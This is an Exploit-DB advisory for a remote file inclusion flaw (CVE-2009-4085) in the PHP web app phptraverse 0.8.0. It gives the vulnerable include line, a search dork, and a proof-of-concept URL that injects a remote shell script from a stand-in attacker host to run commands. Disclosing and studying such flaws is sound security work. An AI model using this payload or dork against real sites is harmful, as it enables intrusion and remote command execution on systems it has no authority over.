phptraverse <= 0.8.0 - Remote File Inclusion Vulnerability

2009-11-24T00:00:00
ID EDB-ID:10219
Type exploitdb
Reporter cr4wl3r
Modified 2009-11-24T00:00:00

Description

phptraverse <= 0.8.0 Remote File Inclusion Vulnerability. CVE-2009-4085. Webapps exploit for php platform

                                        
                                               [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#phptraverse &lt;= 0.8.0 Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/phptraverse/files/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./phptraverse-0.8.0/assets/plugins/mp3_id/mp3_id.php (line 32)
#       &lt;?php
#          include_once $GLOBALS['BASE'].'/PEAR/PEAR.php'; 
#       ?&gt;
#PoC  :  http://server/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
#   all member at  sekuritionline.net          #
#   all member at  manadocoding.net            #
\##############################################/

   [ Gorontalo / 2009 ]